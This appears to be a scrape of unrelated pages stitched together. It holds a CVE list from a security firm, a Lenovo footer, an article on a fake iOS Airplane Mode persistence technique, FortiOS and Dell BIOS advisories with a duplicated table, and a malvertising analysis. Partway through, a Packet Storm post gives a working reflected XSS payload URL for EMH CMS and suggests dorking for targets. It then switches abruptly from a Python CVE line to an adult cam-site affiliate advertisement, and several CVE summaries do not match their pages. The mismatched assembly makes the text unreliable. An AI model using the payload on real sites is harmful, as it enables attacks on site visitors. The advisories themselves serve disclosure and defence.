In Jorani 1.0.0, an attacker could leverage path traversal to access files and execute code on the server.

**OCD CVE Repository**  
   

The table of CVE registered by people working for OCD:

CVE ID / Advisory

EDB ID / Exploit

Type

Product

Author(s)

CVE-2023-26469

PoC

Path traversal

Jorani/bbalet

Guilhem RIOUX

CVE-2023-23565

PoC

Local File Inclusion (authenticated)

Geomatika IsiGeo Web 6.0

Romain PENLOUP

CVE-2023-23564

PoC

Command injection (authenticated)

Geomatika IsiGeo Web 6.0

Romain PENLOUP & Guilhem RIOUX

CVE-2023-23563

PoC

SQL Injection (authenticated)

Geomatika IsiGeo Web 6.0

Romain PENLOUP

CVE-2023-20065

No PoC

Local Privilege Escalation

CISCO IOS XE Software

Mickael DORIGNY  
Benoit MALABOEUF

CVE-2022-45186

PoC

Authenticated Database Leak

SuiteCRM <= 7.12.7 (<= 8.2.0)

Guilhem RIOUX

CVE-2022-45185

PoC

Authenticated RCE (arbitrary unserialize)

SuiteCRM <= 7.12.7 (<= 8.2.0)

Guilhem RIOUX

CVE-2022-41573

PoC

File Upload

Ovidentia 8.3

Nidal GUEDOUAR

CVE-2022-41572

PoC

Privilege escalation

Eyesofnetwork <= 5.3

Guilhem RIOUX

CVE-2022-41571

PoC

Authenticated local file inclusion

Eyesofnetwork <= 5.3

Guilhem RIOUX

CVE-2022-41570

PoC

Unauthenticated sql injection

Eyesofnetwork <= 5.3

Guilhem RIOUX

CVE-2022-35914

PoC

Unauthenticated RCE

GLPI (versions < 10.0.3 < 9.5.9 )

Cyril SERVIERES

CVE-2022-34328

PoC

SQL Injection (Authentificated)

PMB (version 7.4.1 )

Mike HOUZIAUX

CVE-2022-34328

PoC

XSS (Reflected)

PMB (version 7.3.10 )

Mike HOUZIAUX

CVE-2021-46107

PoC

Unauthenticated SSRF

Ligeo Archives (version < 4.0.78)

Guilhem RIOUX

CVE-2021-44032

PoC

Authentication Bypass

TP-Link Omada SDN Controler V4.4.4 (Windows)

Kevin LEHONGRE

CVE-2021-42056

PoC

Privilege Escalation

Safenet Authentication Client (Linux)

Wilfried PASCAULT

CVE-2021-36355

PoC

File upload to RCE

evolucaire imaging <8.5 (8.2.0.12)

Cyril SERVIERES

CVE-2020-2528

PoC

XSS (Reflected)

EasyVista 2018.1.185.5

Mike HOUZIAUX

CVE-2020-25287

PoC

Client Side Template Injection

EasyVista 2018.1.185.5

Mike HOUZIAUX

CVE-2020-25287

PoC

Authenticated RCE

Pligg 2.0.3

Mike HOUZIAUX

CVE-2020-17454

PoC

Self XSS

WSO2 API Manager: 3.1.0 or earlier

Zakaria BRAHIMI

CVE-2020-14950

PoC

Authenticated RCE

aapanel 6.6.6

Mike HOUZIAUX

CVE-2020-14462

PoC

Authenticated reflected XSS

Caldera 2.7.0

Aurélien CHALOT

CVE-2020-14421

PoC

Authenticated RCE

aapanel 6.6.6

Mike HOUZIAUX

CVE-2020-14295

PoC

Authenticated RCE (from SQLi)

cacti (1.2.7, 1.2.12)

Cyril SERVIERES

CVE-2020-14146

PoC

XSS (Reflected)

KumbiaPHP 1.1.1

Mike HOUZIAUX

CVE-2020-11712

PoC

XSS (Reflected)

Openupload 0.4.3

Mike HOUZIAUX

CVE-2020-10787

PoC

Root EoP

VestaCP 0.9.8-26

Alexandre ZANNI

CVE-2020-10786

PoC

Authenticated RCE

VestaCP 0.9.8-26

Alexandre ZANNI

CVE-2020-10220

48208

Unauthenticated SQLi

rConfig < 3.9.4

Jean-Pascal THOMAS

CVE-2020-8776  
CVE-2020-8777  
CVE-2020-8778

48162

Stored XSS

Alfresco 5.2.4

Alexandre ZANNI  
Romain LOISEL

CVE-2020-1949

PoC

Reflected XSS

Sling CMS App 0.14.0 and previous releases

Guillaume GRABÉ

CVE-2019-19585

PoC

Root LPE

rConfig < 3.9.4

Jean-Pascal THOMAS

CVE-2019-19509

47982

Authenticated RCE

rConfig < 3.9.4

Jean-Pascal THOMAS

CVE-2019-15253

48459

Stored XSS

Cisco DNAC 1.3

Dylan GARNAUD  
Benoit MALABOEUF

CVE-2019-13029

47146

Stored XSS

REDCap 8.10/9.1

Alexandre ZANNI  
Dylan GARNAUD

Note: the table is sorted by CVE ID.

CVE-2023-26469: GitHub - Orange-Cyberdefense/CVE-repository: Repository of CVE found by OCD people

A vulnerability was reported in BIOS for ThinkPad P14s Gen 2, P15s Gen 2, T14 Gen 2, and T15 Gen 2 that could cause the system to recover to insecure settings if the BIOS becomes corrupt.

**About Lenovo**

*   Our Company
*   News
*   Investor Relations
*   Sustainability
*   Product Compliance
*   Product Security
*   Lenovo Open Source
*   Legal Information
*   Jobs at Lenovo

**Shop**

*   Laptops & Ultrabooks
*   Tablets
*   Desktops & All-in-Ones
*   Workstations
*   Accessories & Software
*   Servers
*   Storage
*   Networking
*   Laptop Deals
*   Outlet

**Support**

*   Drivers & Software
*   How To's
*   Warranty Lookup
*   Parts Lookup
*   Contact Us
*   Repair Status Check
*   Imaging & Security Resources

**Resources**

*   Where to Buy
*   Shopping Help
*   Track Order Status
*   Product Specifications (PSREF)
*   Forums
*   Registration
*   Product Accessibility
*   Environmental Information
*   Gaming Community
*   LenovoEDU Community
*   LenovoPRO Community

© Lenovo.  
| | | |

CVE-2023-4030: Multi-vendor BIOS Security Vulnerabilities (August 2023) - Lenovo Support US

Cybersecurity researchers have documented a novel post-exploit persistence technique on iOS 16 that could be abused to fly under the radar and main access to an Apple device even when the victim believes it is offline.
The method "tricks the victim into thinking their device's Airplane Mode works when in reality the attacker (following successful device exploit) has planted an artificial

Mobile Security / Vulnerability

Cybersecurity researchers have documented a novel post-exploit persistence technique on iOS 16 that could be abused to fly under the radar and main access to an Apple device even when the victim believes it is offline.

The method "tricks the victim into thinking their device's Airplane Mode works when in reality the attacker (following successful device exploit) has planted an artificial Airplane Mode which edits the UI to display Airplane Mode icon and cuts internet connection to all apps except the attacker application," Jamf Threat Labs researchers Hu Ke and Nir Avraham said in a report shared with The Hacker News.

Airplane Mode, as the name implies, allows users to turn off wireless features in their devices, effectively preventing them from connecting to Wi-Fi networks, cellular data, and Bluetooth as well as sending or receiving calls and text messages.

The approach devised by Jamf, in a nutshell, provides an illusion to the user that the Airplane Mode is on while allowing a malicious actor to stealthily maintain a cellular network connection for a rogue application.

"When the user turns on Airplane Mode, the network interface pdp\_ip0 (cellular data) will no longer display ipv4/ipv6 ip addresses," the researchers explained. "The cellular network is disconnected and unusable, at least to the user space level."

While the underlying changes are carried out by CommCenter, the user interface (UI) modifications, such as the icon transitions are taken care of by the SpringBoard.

The goal of the attack, then, is to devise an artificial Airplane Mode that keeps the UI changes intact but retains cellular connectivity for a malicious payload installed on the device by other means.

"After enabling Airplane Mode without a Wi-Fi connection, users would expect that opening Safari would result in no connection to the internet," the researchers said. "The typical experience is a notification window that prompts a user to 'Turn Off Airplane Mode.'"

To pull off the ruse, the CommCenter daemon is utilized to block cellular data access for specific apps and disguise it as Airplane Mode by means of a hooked function that alters the alert window to look like the setting has been turned on.

It's worth noting that the operating system kernel notifies the CommCenter via a callback routine, which, in turn, notifies the SpringBoard to display the pop-up.

A closer examination of the CommCenter daemon has also revealed the presence of an SQL database that's used to record the cellular data access status of each app (aka bundle ID), with a flag set to the value "8" if an application is blocked from accessing it.

"Using this database of installed application bundle IDs we can now selectively block or allow an app to access Wi-Fi or cellular data using the following code," the researchers said.

"When combined with the other techniques outlined above, the fake Airplane Mode now appears to act just as the real one, except that the internet ban does not apply to non-application processes such as a backdoor trojan."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Apple iOS 16 Exploit Enables Stealthy Cellular Access Under Fake Airplane Mode

A stack-based buffer overflow vulnerability [CWE-121] in Fortinet FortiOS before 7.0.3 allows a privileged attacker to execute arbitrary code via specially crafted CLI commands, provided the attacker were able to evade FortiOS stack protections.

** PSIRT Advisories**

**FortiOS - Buffer overflow in execute extender command**

**Summary**

A stack-based buffer overflow vulnerability \[CWE-121\] in FortiOS may allow a privileged attacker to execute arbitrary code via specially crafted CLI commands, provided the attacker were able to evade FortiOS stack protections.

**Affected Products**

FortiOS version 7.0.0 through 7.0.3  
FortiOS 6.4 all versions  
FortiOS 6.2 all versions

**Solutions**

Please upgrade to FortiOS version 7.4.0 or above  
Please upgrade to FortiOS version 7.2.0 or above  
Please upgrade to FortiOS version 7.0.4 or above

**Timeline**

2023-07-28: Initial publication

CVE-2023-29182: Fortiguard


Dell BIOS contain a Time-of-check Time-of-use vulnerability in BIOS. A local authenticated malicious user with physical access to the system could potentially exploit this vulnerability by using a specifically timed DMA transaction during an SMI in order to gain arbitrary code execution on the system.



CVE-2023-28075: DSA-2023-152: Security Update for a Dell Client BIOS Vulnerability


Dell BIOS contains an improper authentication vulnerability. A malicious user with physical access to the system may potentially exploit this vulnerability in order to modify a security-critical UEFI variable without knowledge of the BIOS administrator.



**Vaikutus**

Medium

**Tiedot**

Proprietary Code CVEs

Description

CVSS Base Score

CVSS Vector String

CVE-2023-32453

Dell BIOS contains an improper authentication vulnerability. A malicious user with physical access to the system may potentially exploit this vulnerability in order to modify a security-critical UEFI variable without knowledge of the BIOS administrator.

4.6

CVSS:3.1/AV:P/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:L

Proprietary Code CVEs

Description

CVSS Base Score

CVSS Vector String

CVE-2023-32453

Dell BIOS contains an improper authentication vulnerability. A malicious user with physical access to the system may potentially exploit this vulnerability in order to modify a security-critical UEFI variable without knowledge of the BIOS administrator.

4.6

CVSS:3.1/AV:P/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:L

Dell Technologies suosittelee, että kaikki asiakkaat ottavat huomioon sekä CVSS-peruspistemäärän että kaikki asiaankuuluvat väliaikaiset ja ympäristöön liittyvät pisteet, jotka voivat vaikuttaa tietyn tietoturvahaavoittuvuuden mahdolliseen vakavuuteen.

**Tuotteet, joihin asia vaikuttaa ja tilanteen korjaaminen**

Product

Software/Firmware

Affected Versions

Remediated Versions

BIOS Release Date

Link

Alienware m15 R7

BIOS

Versions prior to 1.18.0

Version 1.18.0 or later

08/07/2023

Go to the Drivers & Downloads site for updates.

Dell G15 5520

BIOS

Versions prior to 1.18.0

Version 1.18.0 or later

08/07/2023

Go to the Drivers & Downloads site for updates.

Dell G16 7620

BIOS

Versions prior to 1.18.0

Version 1.18.0 or later

08/07/2023

Go to the Drivers & Downloads site for updates.

Dell G3 3500

BIOS

Versions prior to 1.26.0

Version 1.26.0 or later

08/07/2023

Go to the Drivers & Downloads site for updates.

Dell G5 15 5500

BIOS

Versions prior to 1.26.0

Version 1.26.0 or later

08/07/2023

Go to the Drivers & Downloads site for updates.

Inspiron 24 5420 All-in-One  
Inspiron 24 5421 All-in-One

BIOS

Versions prior to 1.4.0

Version 1.4.0 or later

08/07/2023

Go to the Drivers & Downloads site for updates.

Inspiron 27 7720 All-in-One

BIOS

Versions prior to 1.4.0

Version 1.4.0 or later

08/07/2023

Go to the Drivers & Downloads site for updates.

Inspiron 3493

BIOS

Versions prior to 1.27.0

Version 1.27.0 or later

08/07/2023

Go to the Drivers & Downloads site for updates.

Inspiron 3593

BIOS

Versions prior to 1.27.0

Version 1.27.0 or later

08/07/2023

Go to the Drivers & Downloads site for updates.

Inspiron 3793

BIOS

Versions prior to 1.27.0

Version 1.27.0 or later

08/07/2023

Go to the Drivers & Downloads site for updates.

Inspiron 5493

BIOS

Versions prior to 1.27.0

Version 1.27.0 or later

08/07/2023

Go to the Drivers & Downloads site for updates.

Inspiron 5593

BIOS

Versions prior to 1.27.0

Version 1.27.0 or later

08/07/2023

Go to the Drivers & Downloads site for updates.

Inspiron 7490

BIOS

Versions prior to 1.22.0

Version 1.22.0 or later

08/07/2023

Go to the Drivers & Downloads site for updates.

Latitude 3140

BIOS

Versions prior to 1.8.0

Version 1.8.0 or later

07/28/2023

Go to the Drivers & Downloads site for updates.

Latitude 7230 Rugged Extreme Tablet

BIOS

Versions prior to 1.8.0

Version 1.8.0 or later

07/31/2023

Go to the Drivers & Downloads site for updates.

OptiPlex 7090

BIOS

Versions prior to 1.19.0

Version 1.19.0 or later

08/03/2023

Go to the Drivers & Downloads site for updates.

Precision 3450

BIOS

Versions prior to 1.19.0

Version 1.19.0 or later

08/07/2023

Go to the Drivers & Downloads site for updates.

Precision 7960 Tower

BIOS

Versions prior to 1.0.8

Version 1.0.8 or later

07/07/2023

Go to the Drivers & Downloads site for updates.

Vostro 5491

BIOS

Versions prior to 1.27.0

Version 1.27.0 or later

08/07/2023

Go to the Drivers & Downloads site for updates.

Vostro 5591

BIOS

Versions prior to 1.27.0

Version 1.27.0 or later

08/07/2023

Go to the Drivers & Downloads site for updates.

Vostro 5890

BIOS

Versions prior to 1.19.0

Version 1.19.0 or later

08/03/2023

Go to the Drivers & Downloads site for updates.

Product

Software/Firmware

Affected Versions

Remediated Versions

BIOS Release Date

Link

Alienware m15 R7

BIOS

Versions prior to 1.18.0

Version 1.18.0 or later

08/07/2023

Go to the Drivers & Downloads site for updates.

Dell G15 5520

BIOS

Versions prior to 1.18.0

Version 1.18.0 or later

08/07/2023

Go to the Drivers & Downloads site for updates.

Dell G16 7620

BIOS

Versions prior to 1.18.0

Version 1.18.0 or later

08/07/2023

Go to the Drivers & Downloads site for updates.

Dell G3 3500

BIOS

Versions prior to 1.26.0

Version 1.26.0 or later

08/07/2023

Go to the Drivers & Downloads site for updates.

Dell G5 15 5500

BIOS

Versions prior to 1.26.0

Version 1.26.0 or later

08/07/2023

Go to the Drivers & Downloads site for updates.

Inspiron 24 5420 All-in-One  
Inspiron 24 5421 All-in-One

BIOS

Versions prior to 1.4.0

Version 1.4.0 or later

08/07/2023

Go to the Drivers & Downloads site for updates.

Inspiron 27 7720 All-in-One

BIOS

Versions prior to 1.4.0

Version 1.4.0 or later

08/07/2023

Go to the Drivers & Downloads site for updates.

Inspiron 3493

BIOS

Versions prior to 1.27.0

Version 1.27.0 or later

08/07/2023

Go to the Drivers & Downloads site for updates.

Inspiron 3593

BIOS

Versions prior to 1.27.0

Version 1.27.0 or later

08/07/2023

Go to the Drivers & Downloads site for updates.

Inspiron 3793

BIOS

Versions prior to 1.27.0

Version 1.27.0 or later

08/07/2023

Go to the Drivers & Downloads site for updates.

Inspiron 5493

BIOS

Versions prior to 1.27.0

Version 1.27.0 or later

08/07/2023

Go to the Drivers & Downloads site for updates.

Inspiron 5593

BIOS

Versions prior to 1.27.0

Version 1.27.0 or later

08/07/2023

Go to the Drivers & Downloads site for updates.

Inspiron 7490

BIOS

Versions prior to 1.22.0

Version 1.22.0 or later

08/07/2023

Go to the Drivers & Downloads site for updates.

Latitude 3140

BIOS

Versions prior to 1.8.0

Version 1.8.0 or later

07/28/2023

Go to the Drivers & Downloads site for updates.

Latitude 7230 Rugged Extreme Tablet

BIOS

Versions prior to 1.8.0

Version 1.8.0 or later

07/31/2023

Go to the Drivers & Downloads site for updates.

OptiPlex 7090

BIOS

Versions prior to 1.19.0

Version 1.19.0 or later

08/03/2023

Go to the Drivers & Downloads site for updates.

Precision 3450

BIOS

Versions prior to 1.19.0

Version 1.19.0 or later

08/07/2023

Go to the Drivers & Downloads site for updates.

Precision 7960 Tower

BIOS

Versions prior to 1.0.8

Version 1.0.8 or later

07/07/2023

Go to the Drivers & Downloads site for updates.

Vostro 5491

BIOS

Versions prior to 1.27.0

Version 1.27.0 or later

08/07/2023

Go to the Drivers & Downloads site for updates.

Vostro 5591

BIOS

Versions prior to 1.27.0

Version 1.27.0 or later

08/07/2023

Go to the Drivers & Downloads site for updates.

Vostro 5890

BIOS

Versions prior to 1.19.0

Version 1.19.0 or later

08/03/2023

Go to the Drivers & Downloads site for updates.

**Versiohistoria**

Revision

Date

Description

1.0

2023-08-08

Initial Release

**Asiaan liittyvät tiedot**

Dell Security Advisories and Notices  
Dell Vulnerability Response Policy  
CVSS Scoring Guide

**Lisätietoja**

**NOTE:** The Affected Products and Remediation table above may not be a comprehensive list of all affected supported versions and may be updated as more information becomes available.

Alienware m15 R7, Dell G5 15 5500, Dell G15 5520, Dell G16 7620, Inspiron 3493, Inspiron 3593, Inspiron 3793, Inspiron 24 5420 All-in-One, Inspiron 24 5421 All-in-One, Inspiron 27 7720 All-in-One

Inspiron 5493, Inspiron 7490, Inspiron 5593, Latitude 3140, Latitude 7230 Rugged Extreme Tablet, OptiPlex 7090 Micro, OptiPlex 7090 Small Form Factor, OptiPlex 7090 Ultra, Precision 3450 XE Small Form Factor, Precision 3450 Small Form Factor , Precision 7960 Tower, Vostro 5890 ...

09 elok. 2023

CVE-2023-32453: DSA-2023-190: Security Update for a Dell Client BIOS Vulnerability

EMH CMS version 0.1 suffers from a cross site scripting vulnerability.

**EMH CMS 0.1 Cross Site Scripting**

Posted Aug 16, 2023

Authored by indoushka

EMH CMS version 0.1 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | c58615aff6cd57a5ca22a34be62372e9e81249eb20b812f9a35ccd440af33052

Download | Favorite | View

**EMH CMS 0.1 Cross Site Scripting**

    ====================================================================================================================================| # Title     : EMH CMS v0.1 XSS Vulnerability                                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(64-bit)                                             | | # Vendor    : http://www.theemhglobal.com/                                                                                       |  | # Dork      : Designed by EMH TheEmhGlobal                                                                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /icoms/news_detail.php?id=%3Cscript%3Ealert(/indoushka/);%3C/script%3E[+] http://127.0.0.1/freedomcentreinternationalorg/icoms/news_detail.php?id=%3Cscript%3Ealert(/indoushka/);%3C/script%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,973)
*   Arbitrary (16,202)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,280)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,345)
*   DoS (23,437)
*   Encryption (2,370)
*   Exploit (51,900)
*   File Inclusion (4,222)
*   File Upload (974)
*   Firewall (821)
*   Info Disclosure (2,775)
*   Intrusion Detection (892)
*   Java (3,044)
*   JavaScript (859)
*   Kernel (6,674)
*   Local (14,453)
*   Magazine (586)
*   Overflow (12,693)
*   Perl (1,423)
*   PHP (5,146)
*   Proof of Concept (2,338)
*   Protocol (3,602)
*   Python (1,535)
*   Remote (30,777)
*   Root (3,584)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,640)
*   Security Tool (7,888)
*   Shell (3,181)
*   Shellcode (1,214)
*   Sniffer (894)
*   Spoof (2,206)
*   SQL Injection (16,373)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (665)
*   Vulnerability (31,778)
*   Web (9,668)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,944)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,815)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,470)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,734)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,822)
*   UNIX (9,291)
*   UnixWare (186)
*   Windows (6,573)
*   Other

EMH CMS 0.1 Cross Site Scripting

Categories: Threat Intelligence
Tags: malvertising

Tags: google

Tags: ads

Tags: malware

Tags: fingerprinting

Malicious ads via search engine results page are getting harder to identify thanks to advanced fingerprinting techniques



(Read more...)




The post Malvertisers up their game against researchers appeared first on Malwarebytes Labs.

Threat actors constantly take notice of the work and takedown efforts initiated by security researchers. In this constant game of cat and mouse chasing, tactics and techniques keep evolving from simple to more complex, and more covert.

This is a trend we have observed time and time again, no matter the playing field, from exploit kits to credit card skimmers. As defenders, we may have mixed reactions: on the one hand, as technical people we naturally appreciate a well-written exploit or piece of code and the challenge it creates. There is something about it that sparks our interest and curiosity. On the other hand, we know that the people behind it have bad intentions and intend on doing harm.

In today's blog post, we look at a recent malvertising chain that started using a more advanced cloaking technique to remain under the radar. Based on our tracking, it is a new trend for these malvertising campaigns dropping infostealers and other malware used by initial access brokers in ransomware operations.

**Malicious ad and cloaking**

Threat actors continue to target certain IT programs such as remote access programs and scanners by creating ads that are displayed on popular search engines such as Google. The ad below is for the Advanced IP scanner tool and was found when performing a Google search from a US IP address.

_Figure 1: Malicious ad on Google for Advanced IP Scanner_

The domain name advnced-lp-scanner\[.\]com may look legitimate but it is not. It was registered on Jul 30 2023 and is hosted on a server in Russia at 185.11.61\[.\]65.

If you were to investigate this ad, you would likely open it up in a virtual machine and see what it leads to. One of the most common checks that is done by threat actors is a simple server-side IP check to determine whether you are running a VPN or proxy or have visited the site before. That means that as researchers we need to constantly find new IP addresses that look legitimate and then revisit the page again.

Interestingly, even with a fresh IP address the landing page looked innocent. This can happen for different reasons, for example if the threat actor is in the process of setting up the site and hasn't finished swapping it to the malicious version. Or it could also be that the time of day is not in line with when the attacker is making the switch.

_Figure 2: Decoy page without any malware to download_

**Advanced fingerprinting**

Looking closer at the network requests from the ad to the web server we saw new code that looked suspicious. This is Base64 encoded JavaScript that is loaded before anything else on the page.

In fact, this client-side request was performed after a server-side IP check to determine if your IP address was clean. In other words, this is another layer that needs to be processed before we get to see what we are looking for.

_Figure 3: Suspicious Base64-encoded code_

We can deobfuscate this code using CyberChef and further beautify it to see what it does. Here are some of those checks:

*   browser properties such as window and screen size
*   time zone (difference between UTC and local time)
*   browser rendering capabilities related to video card driver
*   MIME type for MP4 file format 

_Figure 4: Decoded fingerprinting script_

Many tools used by researchers are scripted in Python and will fail the test. Same goes for virtual machines, the WEBGL\_debug\_renderer\_info API can help to detect if you are using virtualization such as VMware or VirtualBox.

The data that is collected from visitors is then sent back to the attacker's website via a POST request for further parsing and to determine what action to take next.

_Figure 5: POST request sending victim's details to attacker_

Below is the web traffic view of a successful redirection to the malicious page where the victim can download the malware payload.

_Figure 6: Web traffic from malicious ad to payload page_

And this is the malware landing page:

_Figure 7: Malware landing page after successfully passing the fingerprinting checks_

We can now collect the payload and make sure that it is detected.

**Conclusion**

By using better filtering before redirecting potential victims to malware, threat actors ensure that their malicious ads and infrastructure remain online longer. Not only does it make it more difficult for defenders to identify and report such events, it also likely has an impact on takedown actions. In the majority of cases where we have reported malvertising incidents, the abused platform needs to validate the information before taking action against the advertiser.

This makes sense as reports could be erroneous and lead to advertising accounts being suspended unjustly. However, it also means that while an incident is being investigated and reproduced (which could take hours), people will click on those ads and download malware.

As we continue to report malvertising campaigns, we improve our understanding of the threat actors' TTPs and adjust our toolsets accordingly. Any intelligence gathered is shared within our products and ultimately delivered to Malwarebytes customers via web and malware protection updates to ensure they remain protected.

Malvertisers up their game against researchers

An issue in Python cpython v.3.7 allows an attacker to obtain sensitive information via the _asyncio._swap_current_task component.

**Easy, efficient and fully customizable white label cam sites****MAKE MONEY BY PROMOTING CAMS**

Get your own fully featured white label cam site powered by thousands of CAM4 performers giving the hottest live webcam shows and start to monetize your valuable (mobile/desktop) traffic into a source of real money. You will have access to all the tools and a huge global community of performers who are daily online.

You can create as many white label cam sites as you want and track your results in your Pink Label Dashboard.

**More then 10 years online!****All niches Covered**

Access and monetize this huge base of live performer content across countless niches with Pink Label.

CAM4 is one of the world’s top webcam platforms, on the market for over 10 years with a built up global community of 100s of thousands of performers and over 7 billion visits a month.

Create your own cam site, get your traffic thinking pink while you start making green.

**Your own cam site in just a few clicks****Fully customizable**

You can customize your own cam site however you want. Select the type of live content niches, ethnicity, orientation, performer attributes and languages.

Style your own cam site by selecting from available themes, layouts, upload your logos and tracking codes and start generating instant revenue.

Pink Label has created a platform that provides all the features combined with niche based live content that fits to your digital assets and/or marketing strategy.

You can run your own cam site on your own domain or subdomain by following the instructions in your Pink Label dashboard.

**Fully responsive templates****Multiple Layouts**

Select a theme and site layout that fits you the most. Each theme and layout is responsive and works perfectly on a desktop or mobile device.

You can choose from a thumbnail layout or activate a sidebar (left/right).

If you want to write custom CSS for a different template always make sure to update the white label first.

Add your social media accounts to cross promote your own white label cam site.

**Deep analytic overview****REALTIME statistics**

In your dashboard you will have an overview about your earnings, new generated leads, members and other site statistics.

Analyze and track your conversions and traffic campaigns to see what converts the best for your cam site.

**Making money with live cams made easy****What to Expect?**

Pink Label provides you all the features to be successful with promoting multi-niche live cam content.

**Dashboard overview**

Easy-to-use multi-featured dashboard which works smoothly from your desktop or mobile device.

**Desktop and Mobile**

Offer the best live user experience for your desktop and mobile traffic and start to earn instant money.

**Various live niches**

The biggest network of live performers and couples in every kind of niche or location you can think of.

**Multiple site themes**

Select your favorite site theme, layout and run your own cam site on you own Internet (sub)domains.

**Fully customizable**

Use custom CSS code to customize your own cam site in your own desired look/feel.

**Effective promo tools**

Generate XML/JSON feeds or dynamic banners to cross promote your own white label cam site.

**Real-time statistics**

Access detailed real-time statistics about your revenue share, PPL earnings and payouts.

**Customer Support**

Get the best support service from our team who are always ready to answer your questions.

**Top Earnings guaranteed**

You will get 20% Revenue Share from all the sales generated with your white label cam site or up-to $2.00 PPL (Pay-Per-Leads depends per GEO and device) for each new referred member.

Click here to register

**The latest technology mixed with the best live content****YOUR OWN CAM SITE IN JUST A FEW CLICKS**

White label cam platform created to serve different user groups and offer them unique cam sites to have extra revenue streams.

**Affiliates**

Create and configure your own white label cam site running on your own (sub)domain.

Monetize your traffic with the hottest performers giving live shows from all over the world.

Click here to register

**Your own white label cam site****Follow these steps**

**Create account**

**Create white label**

**Configure**

**Upload logos**

**Setup DNS**

**Make money**

**Choose what fits you the most****PAYOUT Structure**

**Revenue share**

20%/ rev share

*   Lifetime guaranteed

**PPL (Pay-Per-Lead)**

up-to $2/ PPL

*   GEO tier payouts for desktop and mobile

**Payout details**

$250/ minimum

1.  Payouts will be done on the 1st and 16th of the month
2.  There will be a 2 week holding period before payouts begin
3.  Your account must hit the $250 minimum payout
4.  You will be paid by wire or Paxum (ACH and Epay will be available shortly)

**GEO/DEVICE Tier program****PPL (pay-per-lead)**

Here you will have an overview how our PPL Tier program works.

**PPL (PAY-PER-LEAD) tiers**

Get paid for every new generated join.

Here you will find an overview from our PPL rates based on GEO tiers:

**Tier #1**  
desktop and mobile $2.00

**Tier #2**  
desktop and mobile $1.00

**Tier #3**  
desktop and mobile $0.02

**Tier #1**

Austria, Australia, Canada, United States, Germany, Netherlands, Italy, Switzerland, Belgium, France, United Kingdom, New Zealand, Spain, Denmark, Finland, Sweden, Norway

**Tier #2**

Portugal

**Tier #3**

Rest of the World

**Conditions**

Here you will find an overview how PPL joins are qualified.

*   PPL only applies for Pink Label white label sites
*   Each new join needs to be confirmed and activated (registration e-mail) by the new member
*   Each new join (member) needs to be logged in at least once into the joined product site

Note

:  
We use a strict anti-fraud policy. By monitoring and logging all activities on our platform we can easily detect possible cases of fraud and abuse.

In addition, we reserve the right to retroactively convert you to our Rev share Program if the quality of your traffic is extremely poor.

**Just try out the new Pink Label**

**Everything you'll need to monetize your traffic****Promo Tools**

Effective tools to increase your revenues

**Dynamic Banners**

Serie of converting dynamic banners in various dimensions to promote your white label cam site.

**XML/JSON feeds**

Generate your own customized XML or JSON feeds to integrate this within your online assets.

**More to come ...**

In the upcoming months we will add more promo tools which you can use to promote your own white label cam site.

**powered by cam4.com, the biggest amateur cam site in the world****Pink Label Features**

**FULLY CUSTOMIZABLE**

Make money with your own fully customized white label cam site in just a few clicks.

Select your desired site theme, layout and setup your your site through our user-friendly and advanced dashboard system.

Upload your logo, add your tracking codes, SEO meta data, social media accounts and switch your DNS to enable your own cam site.

We offer you the best white label cam site platform to get the most out of your valuable traffic!

**LIVE CONTENT IN EVERY NICHE**

You will have direct access to monetize the biggest pools of live webcam girls, guys and couples, all categories in various niches, GEO countries and languages.

Through the Pink Label dashboard you can easily select what kind of content will be published on your own niche based white label cam site.

You can create unlimited white label cam sites running on your own (sub)domain assets.

**CONVERTING MOBILE VERSION**

In 2018, 58% of site visits were from mobile devices.

All our templates are optimized to give your visitors and members the best user experience on their mobile device.

Targeted on optimal conversion and combined with niche based live content, you can easily monetize your traffic on your own customized white label cam site.

**REAL-TIME STATISTICS**

Within your Pink Label Dashboard you can track and analyze your traffic and conversion results for your white label cam sites.

Always monitor and optimize all your media campaigns to get the best conversions.

You will have instant access to generate reports and view your earnings and payout history.

**Everything you need to know about Pink Label****Frequently Asked Questions**

Can't find what you are looking for? Just use our **contact form** and will get back to you.

****What is Pink Label?****

Pink Label is a white label cam site generator for affiliating webmasters, webcam performers and studios from one of the biggest amateur adult webcam community sites, CAM4.

Pink Label uses the model base from CAM4 which is on the top of the market over the last 10 years and hosts more than 75,000 live webcam shows daily, offering more than 1 million hours of live streaming content each week.

Through Pink Label, you can easily create and style your own white label cam site and select which niches are published on your own internet domain or subdomain.

By promoting and driving traffic to your own white label cam site, you can easily create a solid revenue stream.

You will receive for each referred member, a one-time payout (PPL - pay-per-lead) OR you will receive a percentage (revenue share) from what your referred members eventually will spend on your white label cam site.

****What is a white label cam site?****

A white label cam site allows you to rebrand a cam community and promote it as your own site. The cam community takes care of the technical side of things and hiring the models.

All you have to focus on is promoting and driving traffic to your white label version of the cam site to start to make money.

